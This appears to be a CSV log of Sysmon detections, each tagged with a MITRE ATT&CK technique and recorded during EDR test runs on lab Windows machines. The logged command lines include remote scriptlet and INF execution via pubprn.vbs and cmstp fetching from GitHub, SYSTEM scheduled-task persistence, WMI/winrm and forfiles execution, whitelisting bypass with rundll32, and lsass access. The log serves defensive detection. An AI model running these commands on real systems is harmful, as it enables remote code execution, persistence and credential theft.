script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5004 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:45.198 + 747F3D96-6675-5D3F-0000-0010AA498F00 + 4184 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1564436081.793311,2019-07-30T01:34:41.793311+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5002 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Persistence - Scheduled Task Management + 2019-07-29 21:34:40.755 + 747F3D96-6670-5D3F-0000-0010F9148F00 + 7076 + C:\Windows\System32\schtasks.exe + 10.0.17763.1 (WinBuild.160101.0800) + Task Scheduler Configuration Tool + Microsoft® Windows® Operating System + Microsoft Corporation + schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69 + 747F3D96-6670-5D3F-0000-001099048F00 + 2916 + C:\Windows\System32\cmd.exe + cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553028158.70443,2019-03-20T00:42:38.704430+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966330 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:42:38.043 + 365ABB72-543E-5C91-0000-001009C90300 + 3068 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c msg * "hello from run key" + C:\Windows\system32\ + EXAMPLE\user01 + 365ABB72-5417-5C91-0000-002035340300 + 0x33435 + 1 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-543D-5C91-0000-001099A60300 + 2984 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process Access,1556608980.899263,2019-04-30T11:23:00.899263+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10," + + + + + 10 + 3 + 4 + 10 + 0 + 0x8000000000000000 + + + 8341 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 07:23:00.883 + 365ABB72-F7C9-5CC7-0000-0010BF010E00 + 3772 + 1088 + D:\m.exe + 365ABB72-F6A1-5CC7-0000-001072590000 + 492 + C:\Windows\system32\lsass.exe + 0x1410 + C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\system32\KERNELBASE.dll+8185|UNKNOWN(01770343)|UNKNOWN(0176FF9D)|UNKNOWN(0176F8EC)|UNKNOWN(00397486)|UNKNOWN(003973A0)|UNKNOWN(003978A3)|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436080.38552,2019-07-30T01:34:40.385520+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5000 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:40.243 + 747F3D96-6670-5D3F-0000-001099048F00 + 2916 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4998 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:36.528 + 747F3D96-666C-5D3F-0000-00104BB78E00 + 3872 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + calc + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-6642-5D3F-0000-001044A68A00 + 2996 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 27803 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-04-25 22:19:27.149 + 747F3D96-B76F-5EA4-0000-0010624D0600 + 5840 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-B767-5EA4-0000-00209BD30100 + 0x1d39b + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-B769-5EA4-0000-001000800300 + 4472 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1564436076.548587,2019-07-30T01:34:36.548587+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( calc ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4998 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:36.528 + 747F3D96-666C-5D3F-0000-00104BB78E00 + 3872 + C:\Windows\System32\calc.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + calc + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729 + 747F3D96-6642-5D3F-0000-001044A68A00 + 2996 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 27803 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-04-25 22:19:27.149 + 747F3D96-B76F-5EA4-0000-0010624D0600 + 5840 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-B767-5EA4-0000-00209BD30100 + 0x1d39b + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-B769-5EA4-0000-001000800300 + 4472 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1587853177.495367,2020-04-26T02:19:37.495367+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 27803 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-04-25 22:19:27.149 + 747F3D96-B76F-5EA4-0000-0010624D0600 + 5840 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-B767-5EA4-0000-00209BD30100 + 0x1d39b + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-B769-5EA4-0000-001000800300 + 4472 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"}) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.763 + 747F3D96-666B-5D3F-0000-0010EF858E00 + 264 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-666B-5D3F-0000-001033648E00 + 1580 + C:\Windows\System32\cmd.exe + cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436075.91801,2019-07-30T01:34:35.918010+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cscript.exe ) through command line ( cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.763 + 747F3D96-666B-5D3F-0000-0010EF858E00 + 264 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript //nologo "C:\Windows\System32\winrm.vbs" i c wmicimv2/Win32_Process @{CommandLine="calc"} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-666B-5D3F-0000-001033648E00 + 1580 + C:\Windows\System32\cmd.exe + cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,1564436075.878709,2019-07-30T01:34:35.878709+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript //nologo "C:\Windows\System32\winrm.vbs" qc -q) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c winrm qc -q) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4993 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.663 + 747F3D96-666B-5D3F-0000-00102F7F8E00 + 3224 + C:\Windows\System32\cscript.exe + 5.812.10240.16384 + Microsoft ® Console Based Script Host + Microsoft ® Windows Script Host + Microsoft Corporation + cscript //nologo "C:\Windows\System32\winrm.vbs" qc -q + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC + 747F3D96-666B-5D3F-0000-001051638E00 + 5840 + C:\Windows\System32\cmd.exe + cmd /c winrm qc -q + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4991 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.285 + 747F3D96-666B-5D3F-0000-001033648E00 + 1580 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1564436075.34771,2019-07-30T01:34:35.347710+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4991 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.285 + 747F3D96-666B-5D3F-0000-001033648E00 + 1580 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"} + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436075.337716,2019-07-30T01:34:35.337716+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c winrm qc -q ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4990 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:35.246 + 747F3D96-666B-5D3F-0000-001051638E00 + 5840 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c winrm qc -q + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1553029831.815313,2019-03-20T01:10:31.815313+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966503 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 21:00:01.529 + 365ABB72-5851-5C91-0000-00107D050A00 + 2716 + C:\Windows\System32\schtasks.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Manages scheduled tasks + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\schtasks.exe /delete /f /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-528D-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=2003E9B15E1C502B146DAD2E383AC1E3,IMPHASH=D92C80D49382091310FB8DB089F856A9 + 365ABB72-5851-5C91-0000-0010E1030A00 + 2772 + C:\Windows\System32\wsqmcons.exe + C:\Windows\System32\wsqmcons.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,1564436070.807635,2019-07-30T01:34:30.807635+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4988 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:30.462 + 747F3D96-6666-5D3F-0000-0010AE068E00 + 1464 + C:\Windows\System32\forfiles.exe + 10.0.17763.1 (WinBuild.160101.0800) + ForFiles - Executes a command on selected files + Microsoft® Windows® Operating System + Microsoft Corporation + forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80 + 747F3D96-6666-5D3F-0000-001016F78D00 + 2244 + C:\Windows\System32\cmd.exe + cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1553029201.518992,2019-03-20T01:00:01.518992+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966501 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:58:44.187 + 365ABB72-5804-5C91-0000-001044DE0900 + 2456 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-528D-5C91-0000-0020E7030000 + 0x3e7 + 2 + System + MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-57FB-5C91-0000-00104FD40900 + 2128 + C:\osk.exe + "c:\osk.exe" + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436070.258082,2019-07-30T01:34:30.258082+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4986 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:30.221 + 747F3D96-6666-5D3F-0000-001016F78D00 + 2244 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436065.269897,2019-07-30T01:34:25.269897+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4983 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:34:25.180 + 747F3D96-6661-5D3F-0000-00107AB88D00 + 6428 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436065.202954,2019-07-30T01:34:25.202954+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4982 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:34:20.735 + 747F3D96-665C-5D3F-0000-0010E37B8D00 + 4520 + C:\Windows\System32\certutil.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49833 + + false + 151.101.0.133 + + 443 + https + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436061.867545,2019-07-30T01:34:21.867545+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\certutil.exe and initiated network connection from hostname ( MSEDGEWIN10.home 